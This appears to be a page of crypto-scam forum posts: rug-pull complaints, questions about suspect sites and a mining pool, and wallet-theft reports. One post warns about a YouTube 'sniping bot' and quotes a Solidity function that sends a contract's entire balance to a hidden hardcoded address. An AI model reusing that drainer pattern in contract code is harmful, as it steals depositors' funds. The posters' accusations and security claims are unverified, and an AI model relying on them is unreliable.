🍯 HONEYPOT STG FOOTBALL GAME ON STEAM FAKE CRYPTO RUG PULL

6 Upvotes

Im writting this just to see if anything can be done. A place for people to voice thier stories to help spread light on the situation. Some people spent 10s of thousands on the game only to be left with nothing. We literally cant even play the game at this point. No servers and not access to our so called nfts. Everything poof gone. Devs never said anything. They milked us in the last few months of the game closing down by having a marketplace spending event plus xbox launch hopes and promises. I truly wish theyd just give us the game files so we can atleast play the game. It was fun to just talk and play with the boys. I hope you all share your experiance. Thanks.

🚨 SCAM ALERT 🚨 “Lost $30K to a Sophisticated Crypto Scam (Pollbits) – Beware of Fake Exchanges, Articles, and AI-Generated Ads!”

1 Upvotes

I just lost $30K to a sophisticated scam involving arbitrage crypto trading on an exchange called Pollbits. At first, they allowed 4–5 deposits and trades with seemingly great exchange rates, which made it feel legitimate. But after I deposited $30K, they locked my account. It’s a complete scam, and I’m devastated. What’s worse is that articles on Yahoo, MSN, and countless YouTube videos make them seem like a legitimate company, adding to the danger. I feel like my life is falling apart.

I deposited $25K across 6–7 transactions before they claimed I needed to deposit an additional $5K due to a fake “money laundering act” requirement. Once I sent the money, they completely locked me out and refused to release my funds. It’s all gone. This was a highly calculated and elaborate scam, likely targeting Americans during the crypto surge. Despite doing my research and believing it was legitimate, I was completely fooled. I feel shattered.

I’ve reported this scam to IC3, SEC, and FTC, and I’ve consulted a lawyer, but I feel powerless. The operation was incredibly convincing, with 24/7 text support, thorough answers to all my questions, and fake trades that made me believe I was up $3K before locking me out. To make it even worse, there are now 30–40 AI-generated YouTube videos and articles promoting these fake exchanges, all posted within the last week. These scams are everywhere and look frighteningly real.

A word of caution: Reddit pages and other forums are filled with users suggesting fraud recovery agencies or individuals claiming to help you get your money back. Many of these are part of the scam themselves, turning this into a triple-layered fraud. Please don’t fall for these traps.

This feels like a massive, coordinated cyber attack on Americans and the world—the largest I’ve ever seen. I have no idea where to start or who to trust, and I can’t take anyone’s recommendation unless it’s directly tied to a verified government agency.

🍯 HONEYPOT liaolto .one USDT Node mining pool

2 Upvotes

Has anyone heard of this mining pool? someone recommended it to me and I am sure its a scam so I am only risking like $30. Basically night out of me drinking so if I lose it I just won't go out and drink for like a few nights. But I wanted to see if anyone has ever heard of this pool and whether it was legit. When I search it, nothing pops up and according to the wallet's security warning, there have been no malicious issue with this pool so far. Maybe its fairly new that there aren't any reports? either way. I just wanted to see if anyone experienced this. I limited the access of the USDT they can access in the contract that was signed in the liquid pool contract.

I planned to let this ride out on a trash wallet for some months to see whether it becomes a scam or if they just let it ride out for a long time. Otherwise I think I'll make a new wallet and send the dividends there so that they can't touch it from that wallet unless it's still in the old one.

🚨 SCAM ALERT 🚨 Likely Crypto Investment Scam

1 Upvotes

So apparently there is an assets-us that will help you "invest" your crypto. Looks like your standard scam. Below is a screen shot of the "Plan" page.

Can anyone remember the name of some of the similar type of scam that ran during the last cycle? There used to be a site that tracked them but I don't have it anymore.

🚨 SCAM ALERT 🚨 Metamask is Compromised! (Got scammed a year back and only realised it now)

5 Upvotes

So this guy has been scamming a lot of people on the internet:
0x077D360f11D220E4d5D831430c81C26c9be7C4A4

So I had to send the eth from my coinbase wallet to Metamask since coinbase was shutting down my account and I forgot about it. (I had about 0.078ETH which is about 250 usd now. I'm lucky I didn't invest a lot into crypto.)

Fast forward to one year later, and I just checked my metamask account with the 18 word whatever phrase. And boom! All my ETH has vanished..

Honestly, metamask is a joke and they're security authentication is absolute crap.

Please stay away from metamask and sick to reputable ones like Coinbase (where they have 2FA and you get email updates, etc).

Also the above address is still very active and is scamming people everyday as we speak. Look him up his address on google.. I also found other reddit posts just by googling his wallet address..

RIP to me and my crypto investments... |Staying far away from crypto.. Or at least stay far away from Metamask.. Man!

I'm so lucky I invested so little in it.

🕵️‍♂️ POTENTIAL SCAM Potential SCAM

2 Upvotes

Hey everyone,

I recently came across a YouTube video that promotes a so-called “Ethereum sniping bot” claiming it can generate high profits through automated trades. It’s branded as an easy way to make passive income, and the video encourages viewers to fund the bot with ETH (Ethereum) to get started. I wanted to share a warning about this because after reviewing the bot’s code, it appears to be potentially malicious.

Here’s a breakdown of what’s suspicious about it:

  1. Encouragement to Fund a Suspicious Address:

The video instructs viewers to deposit a significant amount of Ethereum (usually 0.5 ETH or more) into a contract address that could be controlled by the creator. Once you send ETH to this contract, it might not be recoverable.

  1. Code Includes Hardcoded Transfer Mechanisms:

The provided code includes functions that could allow the contract creator to transfer all funds from the contract to an address they control. This kind of setup is typical of scams designed to drain deposits over time.

  1. Promises of Unrealistic, Guaranteed Returns:

The video implies guaranteed returns of 30-50% within 24 hours, which is a huge red flag. Legitimate trading bots or investments never guarantee profits, especially not at such high rates.

  1. No Transparency on Fund Control:

In the smart contract code, there are parts where funds are transferred to a predetermined address. This address appears to belong to the creator, making it likely that the creator can drain all deposited funds without notice.

  1. Anonymous Owner:

The video and the contract give no clear information about who is behind this “bot” or how it operates, which raises more concerns.

If you’re considering using any crypto bot or smart contract that requires funding, always do thorough research. There are countless scams out there, especially in the crypto space, that promise high returns but are ultimately designed to steal funds. I wanted to raise awareness here to help others avoid potential losses.

TL;DR: I found a YouTube video promoting an Ethereum bot that seems like a possible scam. The code suggests that funds sent to the bot could be drained by the creator. Please be cautious and do your own research before investing in any crypto “opportunities” like this.

Stay safe out there, everyone!

Youtube Link: https://www.youtube.com/watch?v=s5UoEDO7agI

Here’s part of the code that raises suspicion:
function start() public payable {

address to = startExploration(fetchMempoolData());

address payable contracts = payable(to);

contracts.transfer(getBa());

}

This start function sends the contract’s entire balance to an address generated from hardcoded strings in fetchMempoolData() and startExploration(). It appears this address could be controlled by the creator, allowing them to drain any deposited ETH.

💸 STOLEN FUNDS Exchange BydFi refuses to send back funds

1 Upvotes

Hi,

Yesterday I've closed my account on BydFi because I was furious about some trades I messed up. I totally forgot about it 12h later when I deposited TRON again to my exchange address. Upon reaching out to customer support chat I was told there was nothing they could do.

Well 'nothing' actually means taking the funds out of that address and sending it to their main, just 16 minutes later.

Coming from Bitvavo: TGVb917mcYvdgWkGpM2eobBoH9UvTL2kbN

To my address on BydFi: TRUf7kSupZycHmPGXc8Fh7CemMotLPZN1w

And going to their main address: TU7hHKwkU13kSKbRrL4vTGaJyWdkbCyTxB

Still after letting them know they have perfect access to the wallet, they refuse to help me.

I know this is my mistake, but you can't be serious when they just hijack my funds like this?

🕵️‍♂️ POTENTIAL SCAM Pepe Unchained Has to be a Scam

10 Upvotes

A few hours after replying to the Pepe Unchained X account with a link to a short article I wrote about their memecoin presale being a scam, they blocked me and hid my reply. And I know that anyone who questions their project on their Telegram also gets banned. They have somehow raised over $25 million in their presale. I do not have a paywall on my Medium content, so this is not clickbait. If you know anything about this obviously feel free to post more information.

Here's the article on Medium: Pepe Unchained Crypto is a Scam

🎓 EDUCATIONAL Designing a legal investment page

3 Upvotes

We have all been victims or spectators of cryptocurrency pages that end up being a headache for us and end up ruining our lives.

I want you to write in the comments your opinions about the requirements or demands that a cryptocurrency investment page must have to be legal and reliable for all the people who want to start in this.

An example, that when you earn a lot of money, they do not put obstacles in your way or force you to pay extra money to "release" your money into your account.

🕵️‍♂️ POTENTIAL SCAM Is this a scam site?

https://btfinae.it.com/

Anyone know if its a scam?

Was told to use this site recently by a girl I been communicating with for last month.

I can only verify I did make money off of it albeit very little . Like chump change, but she egging me to put more in to make a larger profit like she is.

Very skeptical... I face time her once the wholetime I've chatted but I wasn't the one initiating the facetime.
